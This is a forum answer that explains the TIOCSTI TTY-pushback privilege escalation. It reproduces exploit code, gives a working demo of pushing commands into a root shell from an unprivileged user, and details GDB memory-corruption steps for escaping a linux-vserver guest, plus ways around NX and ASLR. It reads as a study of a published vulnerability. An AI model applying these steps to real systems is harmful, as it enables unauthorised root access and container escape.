OK, this is not a complete answer therefore I preferred to wait for the bounty to expire to not seem opportunistic. I cannot replicate the linux-vserver
part of the vulnerability (mostly because it probably needs a 2.6 kernel and the assembly above will require that both the host and the guest machines are in 32bit mode). I can only replicate the basic vulnerability, and explain how the rest works. Here goes:
The pushback
The TIOCSTI
ioctl is an esoteric IO control which allows to fake input, from man 4 tty_ioctl
Faking input
TIOCSTI const char *argp
Insert the given byte in the input queue.
Therefore you can place bytes into the input queue of a TTY (or more likely on modern systems PTY, i.e. pseudo terminal) programmatically.
Now, if a TTY is shared by a process that has limited privileges and a process that has elevated privileges (e.g. root shell), you may be able to empty the queue into the elevated privilege shell from the limited shell. This is performed by the example code sample from halfdog, but there is one extra thing we need to know about: how shells deal with the SIGSTOP
signal. So we will make a detour there.
SIGSTOP, SIGTSTP and shells
SIGSTOP is treated in exactly the same way as SIGTSTP (see the SO question), and SIGTSTP is performed in pretty much all terminals with Ctrl+Z. A trivial example would be:
]$ less /etc/group # And hit Ctrl+Z
[1]+ Stopped(SIGTSTP) less /etc/group
]$ fg # fg sends SIGCONT, and we are back inside less
Yet, shells ignore SIGTSTP, for example
]# su - grochmal
]$ # Ctrl+Z does not do anything in here
]$ exit
logout
]# # back into a root shell
Shells do not ignore SIGSTOP but shells that receive SIGSTOP first relay SIGSTOP to all its children and only then wait, this is also the reason you need to use the nohup
command when you want a process to survive shell stop (or shell termination). Hmm... but since nohup
can make a process survive shell stop so can one of our processes that implements similar signal handlers.
Moreover, if we can leave our process running after the shell stops and then inject bytes into the TTY input, who will receive those bytes is the root shell!
The code
The example code does exactly that, first it prepares the signal handlers:
sigAction.sa_sigaction=handleSignal;
sigfillset(&sigAction.sa_mask);
sigAction.sa_flags=SA_SIGINFO;
sigAction.sa_restorer=NULL;
sigaction(SIGSTOP, &sigAction, NULL);
And sends SIGSTOP to its parent (the unprivileged shell):
if (sendSignalFlag) kill(getppid(), SIGSTOP);
It then pushes every byte from the argument after --
into the TTY input:
pushbackLength=strlen(pushbackString)+1;
for(pushbackPos=0; pushbackPos<pushbackLength; pushbackPos++) {
result=ioctl(0, TIOCSTI,
pushbackPos+1!=pushbackLength?pushbackString+pushbackPos:"\n");
if(result) {
fprintf(stderr, "Pushback failed, result %d, error %d (%s)\n",
result, errno, strerror(errno));
return(1);
}
}
And that's all. The only extra trick is the $''
syntax which I'll talk about in the next example:
Example of trivial usage
Let's start from a root shell, perform a su -
and make a trivial pushback.
]# ls /
bin boot dev etc home lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var
]# su - grochmal
]$ wget http://www.halfdog.net/Security/2012/TtyPushbackPrivilegeEscalation/TtyPushbackSignaling.c
]$ gcc -o ttyp TtyPushbackSignaling.c
TtyPushbackSignaling.c: In function ‘main’:
TtyPushbackSignaling.c:83:28: warning: implicit declaration of function ‘getppid’ [-Wimplicit-function-declaration]
if (sendSignalFlag) kill(getppid(), SIGSTOP);
That's fine, they just forgot to add #include <unistd.h>
. And now the pushback:
]$ echo yay >/yay
-bash: /yay: Permission denied
]$ ./ttyp -- $'echo yay >/yay\necho nay >/nay\n'
echo yay >/yay
echo nay >/nay
[1]+ Stopped su - grochmal
]# echo yay >/yay
]# echo nay >/nay
]# # here I regain control of the shell
]# jobs
[1]+ Stopped su - grochmal
]# ls /
bin boot dev etc home lib lib64 lost+found media mnt nay opt proc root run sbin srv sys tmp usr var yay
As the user grochmal
I can't write to /yay
, but if I push the echo
into the input queue and force the root shell to execute it, it goes out with root privileges. The ./ttyp
call uses the $''
shell syntax which allows me to embed \n
characters as newlines (0x0a) notas the two characters \
and n
.
]$ echo 'yay\nyay'
yay\nyay
]$ echo $'yay\nyay'
yay
yay
Inside the virtual container
(Can't replicate this, can only argue about how it should work)
Now comes the tricky bit of your question, namely this:
cat <<EOF > /x
#!/bin/bash
exec /TtyPushbackSignalin --NoSignal -- \$'\ntouch /xxx-outside\nstty sane'
EOF
chmod 0755 /x
gdb --pid [pid of login process]
(gdb) set *0x8051000=0x7880cd
(gdb) set *0x8051004=0x8051002
(gdb) set *0x8051008=0
(gdb) set $eax=0x0b
(gdb) set $ebx=0x8051002
(gdb) set $ecx=0x8051004
(gdb) set $edx=0x8051008
(gdb) set $eip=0x8051000
(gdb) quit
This expects a vitualisation engine (in this case linux-vserver
) to share a TTY between the host and the guest machines. In other words we are not escalating privileges from a normal user to root but from root on a virtual machine into root on the host machine.
The first part is not that different from the trivial example above. We create a script named /x
and call the pushback code from inside it. The only differences are:
- We will call this upon logout (see more below), so we do not need to send SIGSTOP ourselves. We use
--NoSignal
for that (it controls that flag in the code).
- We need to escape the
$
(\$
) since it needs to be passed to exec
So yeah we have a script (/x
) that is executable (chmod 755
). If we can force that script to be called upon logoff (and the TTY is shared) we win. We know that logoff is performed by waking up the login
process which then returns the TTY.
Note: most of today's Linux systems will be using systemd-login
not plain login
.
The assembly part
The login process is waiting for SIGCONT (just like any stopped process) and its memory is owned by root of the virtual machine. Since we own that memory we can make the process execute whatever we want by corrupting it. That is what GDB is doing there. Based on the register names in that excerpt we can see that it is running on an i386 Intel CPU, which is little-endian and has a word size of 32bits (4 bytes). We can rewrite that GDB part to an equivalent that use full words (GDB would use full words anyway, the following is just more explicit):
gdb --pid [pid of login process]
(gdb) set *0x8051000=0x007880cd
(gdb) set *0x8051004=0x08051002
(gdb) set *0x8051008=0x00000000
(gdb) set $eax=0x0000000b
(gdb) set $ebx=0x08051002
(gdb) set $ecx=0x08051004
(gdb) set $edx=0x08051008
(gdb) set $eip=0x08051000
(gdb) quit
We are overwriting EIP
the instruction pointer to point to a place in memory which we overwrite with 0x007880cd
. cd
is an OPCODE which take one byte as an argument therefore we can read it as an operation cd80
or simply int 0x80
in Intel assembly (remember that this is little-endian).
int 80
happens to be the interrupt that performs a syscall
on x86 (i386) Intel. The interrupt number is taken from the EAX
register, which we have overwritten with 0x0b
. We can check for that interrupt number in the Linux kernel headers, i.e. in x86/include/generated/asm/syscalls_32.h
. It happens to be:
#ifdef CONFIG_X86_32
__SYSCALL_I386(11, sys_execve, )
#else
__SYSCALL_I386(11, compat_sys_execve, )
#endif
So yeah, once it wake up, the login process will perform the sys_execve
system call. But, wait, according to man 2 execve
, that system call has arguments:
int execve(const char *filename, char *const argv[], char *const envp[]);
All (well, almost all) syscalls have 3 arguments, they are take from the EBX
, ECX
and EDX
registers, which we also conveniently overwrite:
EBX
contains 0x08051002
, which is 2 bytes after 0x08051002
, which we have set to 0x007880cd
. If we remember that this is a little endian machine we can see that the first two bytes after 0x08051002
are 0x0078
. This is interpreted as const char *
therefore it is the character x
(0x78) and the string terminator \0
(0x00).
ECX
should be a const char **
, a pointer of pointers (null terminated for syscall purposes). On x86 Intel a pointer is 4 bytes long. We set ECX
to 0x08051004
, and the first 4 bytes contain 0x08051002
which is a pointer to the string "x"
(remember? that is the content of EBX
). The next 4 bytes (at 0x08051004
) contains only zeros terminating the pointer of pointers.
EDX
contains 0x08051008
which (as a const char **
) points to 4 bytes of zeros, meaning a null argument.
Therefore, in plain C, our call could be written as:
const char *x = "x";
const char **ar = { x, 0 };
execve(x, ar, ar[1]);
This technique of reusing memory locations for several arguments in a syscall is very common in shellcode, this is because it reduces the size of it.
Extra notes
The guys at halfdog also mention NX and ASLR but I have no clue why. NX and ASLR protect from buffer overflows when the attacker either can only overwrite the stack or cannot analyze the specific instance of a process ('cause the stack start is randomized).
NX prevent execution of assembly from the stack. But we do not care about the stack, we pretty much can corrupt the memory next to the current EIP
which would be in a part of memory that is allowed to contain executable instructions.
ASLR randomises the start of the stack location in memory. This prevents a buffer overflow from knowing where it is. There was a vulnerability here that allowed to overcome it by bouncing of lib-exec
(mentioned by halfdog), but it has long been fixed pretty much everywhere.
You can defeat both by simply using GDB and /proc/<PID>/stat
to find the current EIP
, see the relevant SO question, and corrupt memory close to it instead of 0x8051000
.
Conclusion
The vulnerability performed an execve
call from the corrupted login
process. This execve
started the script that pushed bytes into the TTY input queue which then was read by the host machine shell.
I could not replicate this on anything I had. I admit that I did not use an environment similar to what halfdog did (kernel 2.6, x86 Intel, linux-vserver; instead I tried x86_64, kernels 3.16 and 4.7, and Xen). One thing that bugs me is how the execve
call finds the script (that's my major issue with replication), I believe that linux-vserver leaves the host shell in the /
filesystem of the guest machine (see man 7 path_resolution
). Nevertheless, I hope that this more or less clarifies how this should work.